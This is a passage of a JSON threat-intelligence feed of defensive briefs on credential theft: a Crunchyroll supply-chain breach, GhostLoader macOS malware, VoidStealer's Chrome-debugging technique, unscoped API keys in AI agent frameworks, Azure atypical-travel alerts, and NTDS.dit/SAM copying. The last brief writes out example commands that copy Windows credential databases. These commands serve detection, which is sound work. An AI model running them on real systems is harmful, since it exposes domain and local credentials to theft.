(TA0006)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAuthentication:\u003c/strong\u003e The attacker used the stolen Okta credentials to authenticate into Crunchyroll\u0026rsquo;s environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Access:\u003c/strong\u003e Upon successful authentication, the attacker gained access to customer analytics and ticketing data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The attacker exfiltrated approximately 100 GB of data, including PII such as email addresses and IP addresses. (TA0010)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Likely):\u003c/strong\u003e While not explicitly stated, the attacker likely performed some level of lateral movement within the Crunchyroll environment to access the data.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eObjective Achieved:\u003c/strong\u003e The attacker successfully exfiltrated sensitive customer data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Crunchyroll data breach resulted in the exfiltration of 100 GB of customer analytics and ticketing data. This included personally identifiable information (PII) such as email addresses and IP addresses. The exposure of this data could lead to identity theft, phishing attacks targeting Crunchyroll customers, and potential financial fraud. The breach also damages Crunchyroll\u0026rsquo;s reputation and erodes customer trust. 
The incident underscores the critical need for robust security measures across the entire supply chain to protect sensitive customer data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement and enforce strict email security policies to prevent phishing attacks, focusing on employee training to recognize spoofed emails (T1566).\u003c/li\u003e\n\u003cli\u003eDeploy endpoint detection and response (EDR) solutions on all employee machines to detect and prevent malware deployment (TA0005).\u003c/li\u003e\n\u003cli\u003eMonitor Okta authentication logs for suspicious login activity, such as logins from unusual locations or at unusual times (TA0006).\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all user accounts, especially those with access to sensitive data, to mitigate the impact of credential theft (TA0006).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits of all third-party vendors and partners to ensure they meet the required security standards (TA0011).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect the use of stolen Okta credentials based on anomalous login patterns.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-24T12:00:00Z","date_published":"2026-03-24T12:00:00Z","id":"/briefs/2026-03-crunchyroll-breach/","summary":"Crunchyroll suffered a data breach after a Telus employee was phished, leading to Okta credential theft and exfiltration of 100GB of customer data.","title":"Crunchyroll Data Breach via Telus Supply Chain Compromise","url":"https://feed.craftedsignal.io/briefs/2026-03-crunchyroll-breach/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["github","malware","macos","credential-theft","ai"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eGhostLoader is a malware campaign observed using GitHub repositories and AI-assisted 
development workflows to deliver malicious payloads specifically designed to steal credentials from macOS systems. The threat leverages the trust associated with software repositories and the increasing adoption of AI tools in development to potentially bypass security measures. While the exact start date of the campaign is not specified, the report from Jamf highlights its recent emergence as a notable threat. Defenders should prioritize monitoring for suspicious activity related to GitHub repositories and unusual AI-driven development processes. The targeted scope appears to be macOS users who engage with software development resources and AI-related tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker creates a seemingly legitimate software repository on GitHub.\u003c/li\u003e\n\u003cli\u003eThe repository contains a project with files that may appear benign or related to AI workflows.\u003c/li\u003e\n\u003cli\u003eA malicious script or binary, named GhostLoader, is included within the repository or downloaded as a dependency.\u003c/li\u003e\n\u003cli\u003eA user downloads or clones the repository, potentially enticed by AI-assisted development features or other seemingly useful functionality.\u003c/li\u003e\n\u003cli\u003eThe user executes the GhostLoader script or binary on their macOS system.\u003c/li\u003e\n\u003cli\u003eGhostLoader executes, initiating the credential-stealing process.\u003c/li\u003e\n\u003cli\u003eStolen credentials are collected and potentially exfiltrated to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to user accounts or sensitive systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe GhostLoader malware directly targets macOS systems and focuses on credential theft. 
Successful attacks can lead to unauthorized access to sensitive user accounts, intellectual property, and confidential data. The number of victims and specific sectors targeted remain unclear, but the use of GitHub and AI workflows suggests a focus on developers or users involved in AI-related activities. The compromise of credentials can have severe consequences, including financial loss, data breaches, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events on macOS for execution of unusual or unsigned binaries in user directories, potentially indicative of GhostLoader execution (see process creation rule).\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect connections to known malicious infrastructure or unusual data exfiltration patterns after the execution of scripts from cloned GitHub repositories.\u003c/li\u003e\n\u003cli\u003eEducate developers and users about the risks of downloading and executing code from untrusted sources, particularly those related to AI-assisted workflows.\u003c/li\u003e\n\u003cli\u003eEnable and review macOS system logs for suspicious activity related to credential access and keychain modifications.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-21T13:03:03Z","date_published":"2026-03-21T13:03:03Z","id":"/briefs/2024-01-ghostloader/","summary":"GhostLoader malware leverages GitHub repositories and AI-assisted development workflows to distribute credential-stealing payloads targeting macOS systems.","title":"GhostLoader Malware Targeting macOS via GitHub and AI Workflows","url":"https://feed.craftedsignal.io/briefs/2024-01-ghostloader/"},{"_cs_actors":["VoidStealer"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["credential-theft","chrome","debugging"],"_cs_type":"threat","_cs_vendors":[],"content_html":"\u003cp\u003eVoidStealer is a threat actor 
utilizing advanced techniques to extract sensitive information from Google Chrome. This is achieved by abusing Chrome\u0026rsquo;s built-in debugging features. The threat actor\u0026rsquo;s primary goal is to steal credentials, session cookies, and potentially other sensitive data stored within the browser\u0026rsquo;s memory. This allows for account takeover and lateral movement within compromised environments. The technique bypasses traditional security measures, as it operates within a legitimate browser process. This activity started being discussed in open source forums around March 2026 and represents a sophisticated approach to browser credential theft.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the target system through an unspecified method (e.g., malware distribution, social engineering).\u003c/li\u003e\n\u003cli\u003eThe attacker deploys VoidStealer, a custom tool or script designed to interface with Chrome\u0026rsquo;s debugging API.\u003c/li\u003e\n\u003cli\u003eVoidStealer identifies running Chrome processes and attaches itself as a debugger.\u003c/li\u003e\n\u003cli\u003eThe tool leverages the debugging interface to inspect Chrome\u0026rsquo;s memory space.\u003c/li\u003e\n\u003cli\u003eVoidStealer searches for specific data structures and memory regions known to store credentials, session cookies, and other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker extracts the targeted data from Chrome\u0026rsquo;s memory.\u003c/li\u003e\n\u003cli\u003eStolen data is exfiltrated to a command-and-control server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials and session cookies for account takeover, lateral movement, and potentially data exfiltration from other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful VoidStealer 
attacks can lead to significant data breaches, account takeovers, and financial losses. Organizations in any sector are at risk, especially those that heavily rely on web-based applications and services. The compromise of user credentials allows attackers to gain unauthorized access to sensitive corporate resources, intellectual property, and customer data. If successful, this can also lead to follow-on attacks, such as ransomware deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process creation events for unexpected tools attaching to Chrome processes as debuggers to identify potential VoidStealer activity. Deploy the \u0026ldquo;Suspicious Chrome Debugging Attachment\u0026rdquo; Sigma rule to your SIEM.\u003c/li\u003e\n\u003cli\u003eImplement strict process whitelisting policies to prevent unauthorized applications from running on endpoints.\u003c/li\u003e\n\u003cli\u003eEnable and review Chrome\u0026rsquo;s built-in security features, such as password protection and safe browsing, to mitigate the risk of credential theft.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of downloading and executing untrusted software.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-20T05:48:21Z","date_published":"2026-03-20T05:48:21Z","id":"/briefs/2024-01-23-voidstealer-chrome-debugging/","summary":"VoidStealer leverages Chrome debugging capabilities to extract sensitive information, such as credentials and session cookies, directly from the browser's memory.","title":"VoidStealer Steals Secrets by Debugging Chrome","url":"https://feed.craftedsignal.io/briefs/2024-01-23-voidstealer-chrome-debugging/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["ai-agent","api-key","authorization","credential-theft"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA recent audit of 30 popular AI agent 
frameworks, including OpenClaw, AutoGen, CrewAI, LangGraph, MetaGPT, and AutoGPT, reveals a widespread lack of robust authorization mechanisms. The report, published in March 2026, highlights that 93% of these frameworks rely solely on unscoped API keys for authentication. This means that any agent with access to the API key has full privileges, creating significant security risks. Furthermore, none of the frameworks provide per-agent cryptographic identity or revocation capabilities. In multi-agent systems, child agents inherit the full credentials of their parent agents, with no option for scope narrowing. This lack of granular control and isolation can lead to significant security breaches, including credential exposure and privilege escalation, as demonstrated by the 21,000 exposed OpenClaw instances leaking credentials and the 1.5 million API tokens exposed in the Moltbook breach.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to an unscoped API key, either through exposed instances like the 21,000 OpenClaw instances or breaches like the Moltbook incident affecting 1.5 million tokens.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the unscoped API key to authenticate to the AI agent framework.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the API key to control an AI agent, potentially injecting malicious goals or code.\u003c/li\u003e\n\u003cli\u003eIn multi-agent systems, the attacker exploits the inherited privileges of child agents to gain broader access.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the agent\u0026rsquo;s capabilities to access sensitive data or perform unauthorized actions.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges by exploiting vulnerabilities within the agent framework or underlying system.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised agent to move laterally within the system or 
network.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, which could include data theft, system disruption, or further compromise of the environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe widespread use of unscoped API keys and lack of proper authorization in AI agent frameworks create a significant security risk. Successful exploitation can lead to data breaches, system compromise, and reputational damage. The report cites real-world incidents, including 21,000 exposed OpenClaw instances leaking credentials and 1.5 million API tokens exposed in the Moltbook breach, demonstrating the potential for widespread impact. The lack of per-agent revocation means that if one agent is compromised, the API key for all agents must be rotated, causing significant disruption.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement network monitoring to detect unusual traffic patterns originating from AI agent servers. Analyze outbound connections for traffic to unusual or malicious domains (grantex.dev).\u003c/li\u003e\n\u003cli\u003eAudit the configuration of AI agent frameworks to identify instances using unscoped API keys. 
Prioritize upgrading or replacing frameworks that lack proper authorization controls.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule for detecting API key usage in command-line arguments or environment variables to identify potential credential exposure.\u003c/li\u003e\n\u003cli\u003eMonitor for access to sensitive data or resources by AI agents and implement least-privilege access controls.\u003c/li\u003e\n\u003cli\u003eImplement regular security audits and penetration testing of AI agent frameworks to identify and address vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T12:00:00Z","date_published":"2026-03-16T12:00:00Z","id":"/briefs/2026-03-ai-agent-auth/","summary":"A research report auditing popular AI agent projects found that 93% rely on unscoped API keys as the only authentication mechanism, leading to potential credential exposure, privilege escalation, and lateral movement within multi-agent systems.","title":"Unscoped API Keys in AI Agent Frameworks","url":"https://feed.craftedsignal.io/briefs/2026-03-ai-agent-auth/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Azure Active Directory","Microsoft Entra ID Protection"],"_cs_severities":["high"],"_cs_tags":["azure","identity-protection","atypical-travel","account-compromise","credential-theft"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe Atypical Travel detection in Azure Identity Protection is designed to identify instances where a user signs in from two geographically distant locations within a time frame that makes legitimate travel improbable. This anomaly indicates that an attacker may have compromised a user\u0026rsquo;s credentials and is attempting to access resources from a different location. The alert is triggered by the \u0026lsquo;unlikelyTravel\u0026rsquo; risk event type within Azure\u0026rsquo;s risk detection service. 
This capability helps defenders identify compromised accounts and prevent further damage such as data exfiltration or lateral movement within the environment. The detection is based on comparing current sign-in locations against the user\u0026rsquo;s historical sign-in patterns, making it more accurate and less prone to false positives compared to simple geo-location based alerts.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Compromise:\u003c/strong\u003e An attacker obtains a user\u0026rsquo;s credentials through phishing, credential stuffing, or malware.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access (Location A):\u003c/strong\u003e The attacker uses the compromised credentials to sign in from a location that may be atypical for the user.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSuccessful Authentication (Location A):\u003c/strong\u003e The attacker successfully authenticates and gains access to Azure resources.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation (Optional):\u003c/strong\u003e If the compromised account has sufficient permissions, the attacker attempts to escalate privileges within the Azure environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement (Optional):\u003c/strong\u003e The attacker uses the compromised account to move laterally to other resources or accounts within the Azure environment.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSecond Sign-in (Location B):\u003c/strong\u003e Within a short timeframe, the attacker (or another attacker using the same credentials) signs in from a geographically distant location (Location B).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAtypical Travel Alert:\u003c/strong\u003e Azure Identity Protection detects the unlikely travel scenario based on the two geographically improbable sign-ins.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eResource 
Access/Data Exfiltration:\u003c/strong\u003e The attacker accesses sensitive resources or exfiltrates data from the environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful Atypical Travel attack can lead to unauthorized access to sensitive data, privilege escalation, lateral movement within the Azure environment, and potentially data exfiltration. The number of victims depends on the scope of the compromised user\u0026rsquo;s access and the attacker\u0026rsquo;s objectives. Organizations in all sectors are potentially at risk, as attackers often target user accounts with elevated privileges or access to critical data. The financial impact can include the cost of incident response, data breach notifications, and potential regulatory fines.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect Atypical Travel events (logsource: azure, service: riskdetection).\u003c/li\u003e\n\u003cli\u003eInvestigate flagged sessions in the context of other sign-ins from the user, as suggested by the false positives guidance.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all users to mitigate the risk of credential compromise.\u003c/li\u003e\n\u003cli\u003eReview and enforce conditional access policies to restrict access based on location and other factors.\u003c/li\u003e\n\u003cli\u003eMonitor user accounts for unusual activity, such as changes in sign-in patterns or resource access.\u003c/li\u003e\n\u003cli\u003eImplement account lockout policies to prevent brute-force attacks against user accounts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T18:21:00Z","date_published":"2024-01-02T18:21:00Z","id":"/briefs/2024-01-azure-atypical-travel/","summary":"The Atypical Travel detection in Azure Identity Protection identifies potentially compromised user accounts 
by detecting geographically improbable sign-in activity, indicative of account compromise or misuse.","title":"Azure Identity Protection Atypical Travel Anomaly","url":"https://feed.craftedsignal.io/briefs/2024-01-azure-atypical-travel/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["high"],"_cs_tags":["credential-access","windows","ntds","sam","credential-theft"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","CrowdStrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies attempts to copy the Active Directory Domain Database (ntds.dit) or the Security Account Manager (SAM) files on Windows systems. These files contain highly sensitive information, including hashed domain and local credentials, and their unauthorized duplication can lead to significant credential compromise. The detection focuses on identifying specific command-line operations associated with copying these files, including the use of utilities like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003excopy.exe\u003c/code\u003e, and \u003ccode\u003eesentutl.exe\u003c/code\u003e. The rule is designed for data generated by Elastic Defend and also supports third-party data sources like CrowdStrike, Microsoft Defender XDR, and SentinelOne Cloud Funnel, making it broadly applicable for organizations using these security solutions. 
The detection is based on observed attacker behaviors documented in reports such as those detailing Pysa/Mespinoza ransomware and techniques used for credential access.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker gains initial access to a Windows system, potentially through phishing or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attacker elevates privileges to gain necessary access to protected system files, possibly using exploits or misconfigurations.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVolume Shadow Copy Creation (Optional):\u003c/strong\u003e The attacker creates a Volume Shadow Copy (VSS) of the system drive to bypass file locking and access the NTDS.dit or SAM files without disrupting system operations. This may involve commands utilizing \u003ccode\u003evssadmin.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNTDS.dit or SAM File Copy:\u003c/strong\u003e The attacker uses command-line tools like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003excopy.exe\u003c/code\u003e, or \u003ccode\u003eesentutl.exe\u003c/code\u003e to copy the NTDS.dit or SAM files to a different location.  
Example commands include \u003ccode\u003ecopy C:\\\\Windows\\\\NTDS\\\\ntds.dit C:\\\\temp\\\\ntds.dit\u003c/code\u003e or \u003ccode\u003eesentutl.exe /y /vss /d\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStaging:\u003c/strong\u003e The copied files are staged in a temporary directory or network share accessible to the attacker.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Extraction:\u003c/strong\u003e The attacker uses tools like Mimikatz or other credential dumping utilities to extract plaintext passwords and hashes from the copied NTDS.dit or SAM files.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement/Domain Dominance:\u003c/strong\u003e  The attacker uses the extracted credentials to move laterally within the network, compromise additional systems, and potentially achieve domain dominance.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration (Optional):\u003c/strong\u003e The attacker may exfiltrate the copied NTDS.dit or SAM file for offline analysis or further exploitation.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack involving the copying of NTDS.dit or SAM files can lead to a complete compromise of an organization\u0026rsquo;s Active Directory domain and/or local system credentials. This allows attackers to move laterally through the network, access sensitive data, and disrupt business operations. The impact can range from data breaches and financial losses to reputational damage and regulatory fines. Incidents like the Pysa/Mespinoza ransomware attacks highlight the real-world consequences of this type of credential access.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eNTDS or SAM Database File Copied\u003c/code\u003e to your SIEM to detect suspicious copy operations involving NTDS.dit or SAM files. 
Tune the rule based on your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to ensure adequate coverage for the Sigma rules and investigation.\u003c/li\u003e\n\u003cli\u003eMonitor process command lines for the execution of \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003excopy.exe\u003c/code\u003e, and \u003ccode\u003eesentutl.exe\u003c/code\u003e with arguments related to copying NTDS.dit or SAM files as described in the rule \u003ccode\u003eNTDS or SAM Database File Copied\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate and validate legitimate backup or disaster recovery processes, adding exceptions based on stable \u003ccode\u003eprocess.executable\u003c/code\u003e, \u003ccode\u003eprocess.code_signature.subject_name\u003c/code\u003e, \u003ccode\u003eprocess.parent.executable\u003c/code\u003e, bounded \u003ccode\u003eprocess.command_line\u003c/code\u003e source/destination, \u003ccode\u003euser.id\u003c/code\u003e, and \u003ccode\u003ehost.id\u003c/code\u003e to minimize false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-01T12:00:00Z","date_published":"2024-01-01T12:00:00Z","id":"/briefs/2024-01-01-ntds-sam-copy/","summary":"Detects copy operations of Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files, potentially exposing sensitive hashed credentials on Windows systems.","title":"NTDS or SAM Database File Copied","url":"https://feed.craftedsignal.io/briefs/2024-01-01-ntds-sam-copy/"}],"language":"en","title":"CraftedSignal Threat Feed — Credential-Theft","version":"https://jsonfeed.org/version/1.1"}